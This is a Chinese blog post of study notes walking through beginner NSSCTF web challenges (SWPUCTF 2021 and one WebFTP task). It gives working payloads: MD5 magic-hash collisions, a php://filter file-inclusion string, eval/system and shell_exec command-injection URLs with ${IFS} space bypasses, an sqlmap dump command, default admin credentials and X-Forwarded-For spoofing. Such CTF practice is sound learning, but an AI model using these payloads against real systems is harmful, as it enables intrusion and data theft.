【NSSCTF]ctfweb题目-学习笔记 1day

已于 2023-04-16 19:18:16 修改
阅读量1k 收藏 10
点赞数 2
分类专栏: CTF题目笔记 文章标签: 学习 动态规划 web安全 网络 php
于 2023-04-16 19:17:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZhangAweio/article/details/130184167
版权

目录

前言

[SWPUCTF 2021 新生赛]jicao

[SWPUCTF 2021 新生赛]easy_md5

 [SWPUCTF 2021 新生赛]caidao

 [SWPUCTF 2021 新生赛]include

[SWPUCTF 2021 新生赛]easyrce

 [SWPUCTF 2021 新生赛]easy_sql

 [第五空间 2021]WebFTP

[SWPUCTF 2021 新生赛]babyrce

[SWPUCTF 2021 新生赛]Do_you_know_http

总结

前言

ctfweb题目平台:[SWPUCTF 2021 新生赛]jicao | NSSCTF

[SWPUCTF 2021 新生赛]jicao

这道题是一个php代码审计题目

<?php
highlight_file('index.php');
include("flag.php");
$id=$_POST['id'];
$json=json_decode($_GET['json'],true);
if ($id=="wllmNB"&&$json['x']=="wllm")
{echo $flag;}
?>

json_decode — 对 JSON 格式的字符串进行解码

从代码可知 post 发送一个id = “wllmNB” ,定义$json为一个数组的形式

那么就是 json =['x':'wllm']

用到得的浏览器插件 hackbar

NSSCTF{037de6d6-3b9e-4bb9-903f-4236c239b42a}

[SWPUCTF 2021 新生赛]easy_md5

根据题目

<?php 
 highlight_file(__FILE__);
 include 'flag2.php';
 
if (isset($_GET['name']) && isset($_POST['password'])){
    $name = $_GET['name'];
    $password = $_POST['password'];
    if ($name != $password && md5($name) == md5($password)){
        echo $flag;
    }
    else {
        echo "wrong!";
    }
 
}
else {
    echo 'wrong!';
}
?>

$name && $password 不能相等,但$name && $password 的md5值又相等

所以这个问题 如果两个相等的话MD5必然是相等的

PHP会将每一个以 0E开头的哈希值解释为0,那么只要传入的不同字符串经过哈希以后是以 0E开头的,那么PHP会认为它们相同

所以我们只需要找0e开头的即可例如

s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752

得到flag

NSSCTF{bc1ccfc9-194c-4f11-809a-3a39293691fc}

 [SWPUCTF 2021 新生赛]caidao

进去就是提示

 直接用菜刀或蚁剑连接就好了

NSSCTF{6bb489d4-e364-4302-ad0a-35cb90ee4534}

 [SWPUCTF 2021 新生赛]include

看到file一眼就知道就是文件包含漏洞

直接使用convert.base64-encode这个过滤器构造payload

php://filter/convert.base64-encode/resource=flag.php

然后得到

 base64解码得到:
 

NSSCTF{4b858152-b482-4984-a358-ad8dc781923e}

[SWPUCTF 2021 新生赛]easyrce

看到题目就是rce远程代码执行漏洞了

error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['url']))
{
eval($_GET['url']);
}

看到eval函数,首先我们先了解 eval函数system函数的区别

    eval("phpinfo();");   //phpinfo()被执行
    system("phpinfo()");  //phpinfo()不被执行
    system("whoami");    //whoami命令被执行
	eval("whoami");      //whoami命令不被执行

这说明了eval执行的是PHP代码命令而system是执行系统命令,那么我们可以通过eval来执行 system函数

构造payload:

?url=system("ls /");
?url=system("cat /flllllaaaaaaggggggg");

 

NSSCTF{20d42f0c-5c06-4552-8d44-d5bbe220b103}

 [SWPUCTF 2021 新生赛]easy_sql

简单的sql注入漏洞,没有任何的防护措施

直接用sqlmap输入指令:

sqlmap -u "http://node3.anna.nssctf.cn:28330/?wllm=1" -D test_db -T test_tb -C flag,id --dump

flag:

NSSCTF{5eb7d391-5f49-40b7-b2d3-7ed9ffc611b5}

 [第五空间 2021]WebFTP

看到这个题目就知道用的是webftp这个后台管理系统,这个后台管理系统的默认密码是: 

username:admin
password:admin888

我们怎么知道?

直接搜索

 进入进到网站的目录/var/www/html

看到个PHPinfo.php的文件,直接在网站中打开,直接找到flag了

NSSCTF{9371b71b-0d5e-4442-9a20-71cf4621b995}

[SWPUCTF 2021 新生赛]babyrce

error_reporting(0);
header("Content-Type:text/html;charset=utf-8");
highlight_file(__FILE__);
if($_COOKIE['admin']==1) 
{
    include "../next.php";
}
else
    echo "小饼干最好吃啦!";

可以看到这题目的提示发送一个cookie为admin=1的 然后加Content-Type:text/html;charset=utf-8

 看到提示 rasalghul.php,我们打开它,

error_reporting(0);
highlight_file(__FILE__);
error_reporting(0);
if (isset($_GET['url'])) {
  $ip=$_GET['url'];
  if(preg_match("/ /", $ip)){
      die('nonono');
  }
  $a = shell_exec($ip);
  echo $a;
}

可以看到又是新的,看到shell_exec($ip)就懂了应该是rec远程代码执行

而且还把“ ”过滤了=v=

那么我们就要用其他符号代替

空格过滤
< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等

构造payload:

http://node1.anna.nssctf.cn:28064/rasalghul.php?url=ls${IFS}/
http://node1.anna.nssctf.cn:28064/rasalghul.php?url=cat${IFS}/flllllaaaaaaggggggg

NSSCTF{123c45c7-8bb1-48f0-92c3-626cc9e3035d}

[SWPUCTF 2021 新生赛]Do_you_know_http

一看看下去一脸懵逼

看到提示Please use 'WLLM' browser!翻译为

请使用'WLLM'浏览

那我们抓包改一下请求头,User-Agent

 发送直接返回success,又提示a.php

我们继续打开a.php

 然后直接使用 X-Forwarded-For:127.0.0.1 伪造IP请求既可以

NSSCTF{723d93e6-c278-4118-9ec8-c2045413b1e4}

X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。

HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。简单地说,xff是告诉服务器当前请求者的最终ip的http请求头字段通常可以直接通过修改http头中的X-Forwarded-For字段来仿造请求的最终ip

格式为:X-Forwarded-For: 本机IP, 代理1IP, 代理2IP, 代理2IP

总结

今天题目类型有sql注入、getshell、XFF伪造请求头、MD5简单绕过、rec远程命令执行、[SWPUCTF 2021 新生赛]easyrce、[SWPUCTF 2021 新生赛]Do_you_know_http、[SWPUCTF 2021 新生赛]babyrce

Corrot_Pig
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mybatis框架-学习笔记Day01.rar
03-26
本人博客文章《mybatis框架-学习笔记Day01》的相关代码文件本人博客文章《mybatis框架-学习笔记Day01》的相关代码文件本人博客文章《mybatis框架-学习笔记Day01》的相关代码文件本人博客文章《mybatis框架-学习笔记...
Cadence学习笔记1-原理图.pdf
11-16
Cadence学习笔记1-原理图.pdf
CTF练习题[WEB]-cookies
weixin_45246254的博客
02-10 2722
https://ctf.bugku.com/challenges/detail/id/87.html 拿到题目如下,提示:Cookies欺骗 访问跳转到以下地址 http://114.67.175.224:15773/index.php?line=&filename=a2V5cy50eHQ= filename看起来就是base64,拿去解码 扫目录没有发现其他可疑文件 推测攻破点就在这个filename这里了,另外还有个line变量 先把line拿去遍历,没有发现什么 已知的还有一个文件就是
CTF逆向Reverse 花指令介绍 and NSSCTF靶场入门题目复现
Sciurdae的博客
10-10 2323
/(ㄒoㄒ)/~~花指令又名垃圾代码、脏字节,英文名是junk code。花指令就是在不影响程序运行的情况下,往真实代码中插入一些垃圾代码,从而影响反汇编器的正常运行;或是起到干扰逆向分析人员的静态分析,增加分析难度和分析时间。有句话,花指令的目的是阻挠逆向人员的分析,并不是阻止。
NSSCTF | [SWPUCTF 2021 新生赛]Do_you_know_http
2302_80946742的博客
05-13 435
点击发送,可以看到success,关键的是Location后面的./a.php,说明浏览器已经跳转到了另一个页面。(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。也就是说,我们需要借助X-Forwaeded-For来伪装我们的IP为127.0.0.1。然后点击发送,可以看到这里的Location已经变成了./secretttt.php。我们可以将GET后面的/hello.php更换为a.php看看这个页面里的东西。在Host的下面添加。
[SWPUCTF 2021 新生赛]caidao
rev1ve的博客
03-05 1088
[SWPUCTF 2021 新生赛]caidao
javase-学习笔记.pdf
11-28
javase-学习笔记.pdf
C#高级编程-学习笔记.pdf
11-18
C#高级编程-学习笔记.pdf
CTF Web学习笔记
01-11
CTF Web学习笔记,包含杂项和WEB两部分,包含杂项简介,WEB知识点总结以及Web常用套路总结。
[SWPUCTF 2021 新生赛]babyrce(详解)
A_B_c_d_E_fsad的博客
04-04 1851
最近遇到的事太霉了,又是做到一半,靶机拒绝连接我,搞得我做题都不自信了回到正文题目如下(示例):phpelseecho "小饼干最好吃啦!?>小饼干最好吃啦!看了一下,就是cookie值admin等于1时,就能包含文件,行吧,那就等于吧第一次尝试,用了HackBar直接cookie,嘶?坏了?不确定,就用BurpSuite再试一下(如果成功了,那就跳过这部分,当我没说)第二次,可以是我响应太多没响应到,常规的都不行,那就只能用最原始的办法了。
NSSCTFweb刷题记录
fivesheeptree的博客
07-12 337
如果$id等于"wllmNB"并且$json['x']等于"wllm",则将输出$flag的值。将json参数的值解码为,从而使得$json['x']的值等于"wllm"。通过POST方法传递的id参数的值,并将通过GET方法传递的json参数解码为关联数组。
NSSCTF刷题笔记web6——[SWPUCTF 2021 新生赛]caidao
qq_45692883的博客
01-18 557
题目也是非常的简洁明了,考点可能是菜刀的使用,所以稍微绕一下,用菜刀来get shell。直接输入网址以及密码和脚本格式,就可以获取shell。caidao是一款shell管理工具。
[SWPUCTF 2023 秋季新生赛] WEB 部分题目复现
m0_63138919的博客
10-22 328
本文为2023年SWPU NSS 秋季招新赛 (校外赛道) 的部分题解复现 针对自己没做出来的
NSSCTF PWN方向刷题记录
CyhStyrl的博客
04-03 657
流程:先添加note 0 再删除note 0 再添加note 1 并修改note1 内容为payload note1所在地址空间实则为note 0 所在位置(free后指针没有置为null 存在UAF漏洞)
[安洵杯 2019]easy_web详解
weixin_61995249的博客
10-03 684
靶场:https://www.nssctf.cn/problem/732。
[SWPUCTF 2021 新生赛]caidao(一句话木马+蚁剑)
最新发布
2401_84499442的博客
07-07 126
第一种方法:直接post传参,首先eval函数是代码执行,那么我们就写入wllm=system('ls /'),查看服务器文件目录。很明显,这里的flag就是我们要找的文件,然后再执行wllm=system('cat /flag'),查看flag文件内容。当然,很明显,这里是一句话木马,那么我们也可以用蚁剑。第一步,因为他已经给出了密码“wllm”,那么我们就直接连接。然后从下往上依次查找文件,最终在/flga中找到flag。
[SWPUCTF 2021 新生赛]babyrce
wyxlsm的博客
02-21 104
其实看到这 看 preg_match 的函数 再去解 这边看出要绕过空格 得flag值。当我看到这个时候 以往常经验 使用cookie 在burp 工具修改 传参注入。
Java Web前端学习笔记:HTML到AJAX基础
"这篇文档包含了作者在学习Java Web前端时的笔记,主要涵盖了前端开发的基础知识,包括HTML、CSS、JavaScript、DOM编程、jQuery框架以及AJAX基础。" 本文档详细介绍了Java Web前端开发中的核心技术和元素,首先从...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值